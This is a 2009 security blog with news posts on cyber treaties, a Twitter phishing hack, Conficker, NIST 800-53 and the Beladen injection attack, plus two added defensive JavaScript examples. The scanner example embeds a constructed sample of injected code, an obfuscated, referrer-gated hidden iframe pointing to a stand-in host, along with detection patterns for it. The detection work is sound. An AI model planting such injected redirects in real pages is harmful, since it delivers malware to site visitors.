Sunday, June 28, 2009

U.S. and Russia Cyberspace Treaty? Nyet!

In this interesting article from The New York Times today, Russia is looking to negotiate an international treaty for limiting weapons in cyberspace. Such a treaty would be along the lines of similar bilateral agreements limiting chemical and nuclear weapons.

But, according to the article, the U.S. says a cyberwar treaty is unnecessary and instead sees the issue as one of improving international law enforcement. The U.S. argument is that international police protections against cybercrime, which are weak at best right now, would prevent cyberwar.

The difference in viewpoints is interesting, since the Russians see the lack of a treaty as a dangerous prelude to a virtual arms race in cyberspace, similar to what happened during the Cold War with nuclear weapons, while the U.S. sees the issue as one of law enforcement. Besides, according to the U.S., the 50,000 attacks a day hitting U.S. targets -- mostly from China and Russia -- need to be criminalized to be legally combated.

In addition, a treaty would be hard to enforce since there are no jurisdictions online. Attacks emanating from a hostile country could anonymously bounce around servers all over the world, making the true origin hard to pinpoint.

The issue is also interesting since it comes within a week of U.S. Defense Secretary Robert Gates announcing the formation of a new cybercommand at the Pentagon.

Wednesday, June 24, 2009

Twitter Victim of Possible Phishing Attack

In a high profile recent hack of Twitter, the account of well-known Mac evangelist Guy Kawasaki was breached. Kawasaki's tweets were sending out a link to a porn video, something the tech guru isn't known for.

It's not clear exactly how the account was breached, but there are suspicions of a phishing site that tricks users into logging into a fake Twitter site that steals their authentication credentials. The porn site linked from Kawasaki's tweets downloaded Trojans onto the desktops of unsuspecting users and targeted both Windows and Mac systems.

Twitter seems to be in the sights of hackers recently, since a well-placed hack of a user with a large number of followers -- like Kawasaki's 140,000 -- can spread web nasties very, very quickly.

Other recent attacks have been against the Twitter account of the Mormon Church of Latter Day Saints and Cligs, a URL-shortening service competing with the famous TinyURL.

Monday, June 15, 2009

An Eye Chart to Test for Conficker?

This is a new one. At first, I thought it was a bit bizarre. But when I took a second look, I actually thought it was sort of clever. The Conficker Eye Chart is a test to see if your workstation is infected with Conficker.

It works by checking whether your browser can reach the web sites of common anti-virus vendors, access that is often cut off on machines plagued by Conficker.

If you climb up the URL of the Eye Chart, you get to the Conficker Work Group blog, run by a group of IT security professionals tracking the activities of this most mysterious of attacks against computer systems and networks.
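The eye-chart idea reduces to a small amount of browser code, so here is an added example of it, written for this post and not the Conficker Work Group's own chart: the page tries to load one small image from each of several security-vendor sites plus one from an unrelated control site, and infers the machine's state from which images arrive. Every host name below is a constructed placeholder, the probe names and verdict strings are mine, and the control image is an assumption I added so that a machine with no network access at all is not reported as infected.

```javascript
// Added example, not the Conficker Work Group's eye chart: the same idea in
// miniature. Conficker stops an infected host from reaching anti-virus vendor
// sites, so a page that tries to load one small image from each of several
// security sites plus one from an unrelated control site can infer the
// machine's state from which images arrive. All hosts below are constructed
// placeholders, not the real chart's URLs.

const PROBES = [
  { name: "control", url: "https://control.example/probe.png",     type: "control" },
  { name: "vendorA", url: "https://av-vendor-a.example/probe.png", type: "security" },
  { name: "vendorB", url: "https://av-vendor-b.example/probe.png", type: "security" },
  { name: "vendorC", url: "https://av-vendor-c.example/probe.png", type: "security" },
];

// Turn a map of probe name -> boolean (true = image loaded) into a verdict.
// The control image guards against a false alarm when nothing loads at all.
function classify(results) {
  const security = PROBES.filter((p) => p.type === "security");
  const loaded = security.filter((p) => results[p.name] === true).length;
  if (results.control !== true) return "no-network";   // offline or fully blocked: not diagnostic
  if (loaded === security.length) return "clean";      // every vendor site reachable
  if (loaded === 0) return "possibly-infected";        // only the security sites are unreachable
  return "inconclusive";                               // partial: a proxy/filter or a variant
}

// Browser side: load every probe image with a timeout and resolve to a results map.
function runEyeChart(timeoutMs = 5000) {
  return new Promise((resolve) => {
    const results = {};
    let pending = PROBES.length;
    const settle = (name, ok) => {
      if (name in results) return;           // first outcome (load, error or timeout) wins
      results[name] = ok;
      if (--pending === 0) resolve(results);
    };
    for (const p of PROBES) {
      const img = new Image();
      setTimeout(() => settle(p.name, false), timeoutMs);
      img.onload = () => settle(p.name, true);
      img.onerror = () => settle(p.name, false);
      img.src = `${p.url}?t=${Date.now()}`;  // cache-bust so a cached copy cannot mask blocking
    }
  });
}

// Only meaningful in a browser; under Node there is no Image and this is skipped.
if (typeof Image !== "undefined") {
  runEyeChart().then((r) => console.log(classify(r), r));
}
```

The "inconclusive" verdict is the important one for a practitioner: a corporate web filter or ad blocker that happens to block some security sites produces exactly the partial pattern above, so a chart like this is a quick triage hint, not proof of infection, and a "possibly-infected" result should be followed by a scan from clean media rather than treated as a diagnosis.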

Sunday, June 14, 2009

Defending Cybersecurity and Protecting Privacy

New initiatives by the Obama administration to protect cyberspace may run up against protecting online privacy, according to this article last week in The New York Times.

The creation of a new cybersecurity command by the Pentagon to do the job may also give the government extra powers to snoop on individual communications over the Internet. The idea is for the Pentagon to beef up its capabilities to fight cybercombat, just as it does with its physical forces on air, sea and land.

Since some of this will also involve taking over cybermonitoring functions of the NSA, a move the government initiative hopes will reduce the ongoing turf wars over cyberdefenses, the privacy issue has come to the fore.

Gen. James Cartwright, vice chairman of the Joint Chiefs of Staff, commented in the article that sovereignty in cyberspace, which is truly global, is difficult to define. Maren Leed, a former Pentagon specialist in cyberoperations and now a defense expert at the Center for Strategic and International Studies, was also quoted as saying what would be an acceptable intrusion in time of war had to be defined.

But President Obama, in his White House speech on the subject last month, said the effort “will not — I repeat, will not — include monitoring private sector networks or Internet traffic.”

NIST Security Control Document Available for Review

The National Institute of Standards and Technology (NIST) has released the latest draft of its 800-53 publication on security controls. The updated document, Revision 3, part of the well-known 800 series of NIST guidelines for IT security, is available on their web site for public comment until July 1.

The document has input, as well, from both the military and intelligence communities on improving security controls for IT systems.

Here are highlights from the document of some of the updates:
  • A simplified, six-step Risk Management Framework
  • Additional security controls and control enhancements for advanced cyber threats
  • Recommendations for prioritizing or sequencing security controls during implementation or deployment
  • Revised security control structure with a new references section to list applicable federal laws, Executive Orders, directives, policies, standards, and guidelines related to a control
  • Elimination of security requirements from Supplemental Guidance sections
  • Guidance on using the Risk Management Framework for legacy information systems and for external providers of information system services
  • Updates to security control baselines consistent with current threat information and known cyber attacks
  • Removal of the FIPS 199 security control baseline allocation bar resident with each control
  • Organization-level security controls for managing information security programs
  • Guidance on the management of common controls within organizations
  • Strategy for harmonizing FISMA security standards and guidelines with international security standard ISO/IEC 27001

Friday, June 05, 2009

Mass Injection Attack Hits 20,000 Web Sites

Websense Security Labs has detected a mass injection attack affecting 20,000 web sites with malicious JavaScript that hides code redirecting users to a site with active exploits. The attack, uncovered last week, used a domain similar to the legitimate domain for Google Analytics.

In another post this week, Websense Security Labs provided more technical details about what it called the Beladen attack, German for "loaded," because the hacked web site is loaded with exploits.

Basically, the hacked legitimate site contains obfuscated code that first verifies the referrer, so as not to expose the code, and then redirects the user's browser to the Beladen web site, chock full of malicious goodies.
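The two traits described above, a look-alike analytics domain and an obfuscated, referrer-gated redirect, are exactly what a site owner would scan their own pages for after an incident like this. Here is an added example of such a defender-side scanner, written for this post and not Websense's or anyone else's tooling: it walks the script tags of a fetched page, flags external scripts whose domain is a near-miss of google-analytics.com, and flags inline scripts only when several indicators converge. The HTML sample, the look-alike host google-analytlcs.example, the indicator names and the thresholds are all constructed for the example.

```javascript
// Added example, not Websense's code: a small scanner for the two traits the
// Beladen write-up describes. Everything below (sample page, look-alike host,
// indicator names, thresholds) is constructed for illustration.

const LEGIT_HOSTS = ["google-analytics.com", "www.google-analytics.com", "ssl.google-analytics.com"];
const BRAND = "google-analytics";

// Classic edit distance, single-row version.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Host part of an absolute or protocol-relative URL, lower-cased; null otherwise.
function hostOf(url) {
  const m = /^(?:https?:)?\/\/([^/:?#]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// True when the registrable label is within two edits of the brand but the host
// is not one of the genuine Google Analytics hosts (catches typo-squats and
// the same name under a different top-level domain).
function lookalikeOf(host) {
  if (!host || LEGIT_HOSTS.includes(host) || host.endsWith(".google-analytics.com")) return false;
  const labels = host.split(".");
  if (labels.length < 2) return false;
  return levenshtein(labels[labels.length - 2], BRAND) <= 2;
}

// Scan every <script> in a page. External scripts are judged by host; inline
// scripts are flagged only when at least two indicators appear together, so a
// plain analytics snippet (one decoder call, a few %XX escapes) is not flagged.
function scanHtml(html) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const srcRe = /\bsrc\s*=\s*["']?([^"'\s>]+)/i;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = srcRe.exec(attrs);
    if (src) {
      const host = hostOf(src[1]);
      if (lookalikeOf(host)) findings.push({ kind: "lookalike-src", host });
      continue;
    }
    const reasons = [];
    if (/\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(/.test(body)) reasons.push("decoder-call");
    if (/document\.referrer/.test(body)) reasons.push("referrer-check");
    if (/(location\.(href|replace)|<iframe)/i.test(body)) reasons.push("redirect");
    const encoded = (body.match(/%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}/gi) || []).length;
    if (encoded >= 16) reasons.push("encoded-payload");
    if (reasons.length >= 2) findings.push({ kind: "suspicious-inline", reasons });
  }
  return findings;
}

// Constructed sample: a genuine analytics include and snippet, then an injected
// look-alike include and an injected, referrer-gated, hex-encoded iframe writer.
// The encoded string decodes to the inert placeholder "//payload.placeholder.example".
const SAMPLE_HTML = `
<html><head>
<script src="http://www.google-analytics.com/ga.js"></script>
<script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script>
<script src="http://google-analytlcs.example/ga.js"></script>
<script>var p=unescape('%2f%2f%70%61%79%6c%6f%61%64%2e%70%6c%61%63%65%68%6f%6c%64%65%72%2e%65%78%61%6d%70%6c%65');if(document.referrer.length>0){document.write('<iframe src="'+p+'" width=1 height=1></iframe>');}</script>
</head><body>hello</body></html>`;

console.log(JSON.stringify(scanHtml(SAMPLE_HTML), null, 2));
```

Run against the sample, the scanner reports the look-alike include and the injected inline script (four indicators) and stays quiet on the genuine analytics snippet, which is the point of requiring indicators to converge: any one of them on its own is common in legitimate pages. A real deployment would fetch pages server-side on a schedule and diff findings against a known-good baseline, since the injection is what changes, not the page's normal scripts.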

Operational Security for the Web

The term operational security usually refers to physical security -- things like keeping your basic movements a secret, protecting your identity and other ways to keep one's "cover." In this brief article by Ira Winkler on the Internet Evolution newsletter, Winkler gives an example of an undercover security guard at a store who practiced poor operational security and, as a result, was easy to spot.

What's interesting in this little piece is that Winkler then explains how many companies practice similar poor operational security on the web, by disclosing too much information -- information that could be used by clever social engineers to gain malicious access.

He talks about how companies often fail to classify their data, so they don't even know what they need to protect. Winkler, a former NSA employee who knows a thing or two about operational security, is also the author of a fascinating book, Spies Among Us, about insider threats and corporate espionage.